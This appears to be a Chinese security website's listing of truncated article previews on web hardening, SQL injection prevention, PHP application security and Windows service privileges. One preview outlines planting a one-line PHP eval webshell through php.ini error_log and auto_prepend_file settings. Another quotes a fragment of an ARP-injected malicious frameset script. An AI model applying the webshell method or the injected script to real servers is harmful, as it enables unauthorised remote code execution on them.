谷歌教你十招保护Gmail帐户安全
谷歌公司(Google)周三透露,中国黑客对多名美国高级官员和其他人的电子邮件帐户发起攻击。你可能想知道能采取哪些措施能提升你Gmail帐户的安全性。 以下是谷歌公司给出的十条建议: (1)使用强密码,并且不要在其它任何一个网站使用该密码。谷歌有一套创建强密码的好建议,...
利用php.ini拿shell及防范
1.把error_log设置到web目录 ~例如hackxl.php 2.auto_prepend_file设为一句话 ~比如设为?php eval($_REQUEST[#]);? 3.然后访问任意php php文件后会因为找不到auto_prepend_file的文件而报错,而会产生报错;把?php eval($_REQUEST[#]);?写入了hackxl.php auto_prepend_file指...
超强JSP防SQL注入攻击
第一种采用预编译语句集,它内置了处理SQL注入的能力,只要使用它的setString方法传值即可: String sql= select * from users where username=? and password=?;PreparedStatement preState = conn.prepareStatement(sql);preState.setString(1, userName);preState.setStr...
特定类型ARP挂马的临时解决方法
现在ARP挂马流行将整个主页都FRAMESET,如: htmlhead/headscriptfunction showme(){var CK=document.cookie;var sa=CK.indexOf(CK);if(sa!=-1){}else{var EP=new Date();EP.setTime(EP.getTime()+24*60*60*1000);document.cookie=CK=test;expires=+EP.toGMTString();self.h...
apache+php+mysql安全配置全攻略
apache+php+mysql安全配置全攻略个人整理算不上原创,mysql的略过不说了 apache方面: 1.编译源代码,修改默认的banner 2.修改默认的http状态响应码404,503等默认页面 3.访问特殊目录需要密码.htaccess 4.关闭索引目录options -Indexes 5.关闭CGI执行程序options -ExecCGI 6....
确保PHP应用程序的安全[5]
结束语 本教程讨论了许多问题: 使用 mysql_real_escape_string() 防止 SQL 注入问题。 使用正则表达式和 strlen() 来确保 GET 数据未被篡改。 使用正则表达式和 strlen() 来确保用户提交的数据不会使内存缓冲区溢出。 使用 strip_tags() 和 htmlspecialchars() 防止用户提...
确保PHP应用程序的安全[3]
缓冲区溢出攻击 缓冲区溢出攻击 试图使 PHP 应用程序中(或者更精确地说,在 Apache 或底层操作系统中)的内存分配缓冲区发生溢出。请记住,您可能是使用 PHP 这样的高级语言来编写 Web 应用程序,但是最终还是要调用 C(在 Apache 的情况下)。与大多数低级语言一样,C 对...
![确保PHP应用程序的安全[4]](https://www.bnxb.com/uploads/allimg/111030/1_1030212940Xc.jpg)
确保PHP应用程序的安全[4]
浏览器内的数据操纵 有一类浏览器插件允许用户篡改页面上的头部元素和表单元素。使用 Tamper Data(一个 Mozilla 插件),可以很容易地操纵包含许多隐藏文本字段的简单表单,从而向 PHP 和 MySQL 发送指令。 用户在点击表单上的 Submit 之前,他可以启动 Tamper Data。在提...
确保PHP应用程序的安全[2]
防止 SQL 注入攻击 在 SQL 注入攻击 中,用户通过操纵表单或 GET 查询字符串,将信息添加到数据库查询中。例如,假设有一个简单的登录数据库。这个数据库中的每个记录都有一个用户名字段和一个密码字段。构建一个登录表单,让用户能够登录。 清单 5. 简单的登录表单 html he...
确保PHP应用程序的安全[1]
大家都知道安全性是重要的,但是行业中的趋势是直到最后一刻才添加安全性。既然不可能完全保护 Web 应用程序,那么为什么要费这个劲儿呢,不是吗?不对。只需采用一些简单的步骤就能够大大提高 PHP Web 应用程序的安全性。 开始之前 在本教程中,您将学习如何在自己的 PHP W...
谈谈aspx网站的安全
aspx是.net中的web开发,asp.net是对asp的升级!通过拿站我个人感觉aspx的网站安全,相对asp进行了增强! 1当数据库是access的时候,aspx放在app_data目录下的时候,完全不可以通过http下载或迅雷下载,这比asp好,asp当然配置的好的话也可以,如添加防下载表,.mdb服务器配...
Windows下降权MYSQL和apche的运行级别
Windows下降权MYSQL和apche的运行级别 1、MYSQL的降权运行新建立一个用户比如mysqlnet user mysql microsoft /addnet localgroup users mysql /del不属于任何组如果MYSQL装在d:\mysql ,那么,给 mysql完全控制 的权限然后在系统服务中设置,MYSQL的服务属性,在登录属性当...